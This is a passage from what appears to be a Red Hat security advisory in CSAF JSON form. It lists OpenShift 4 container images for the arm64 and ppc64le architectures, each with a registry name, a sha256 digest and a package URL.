"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3Af99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606725"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3A6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3A458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606385"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3Aa95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572657"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3Ae5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3A35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605177"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3Aaee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557298"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565214"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3A9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564931"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3A7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Aaccb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3Acb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605144"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3Ae1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606817"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3A80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3A0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606351"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3A173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564694"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3A718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572853"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3A3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9@sha256%3A6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9-operator@sha256%3A75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563629"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-nfs-rhel9@sha256%3Afdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557766"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3Ab8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3A0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563562"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775629870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3A5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3A5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604398"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3A43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3Ac0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606841"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606783"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3Abb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604596"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3A1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3Adbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"product_identification_helper": {
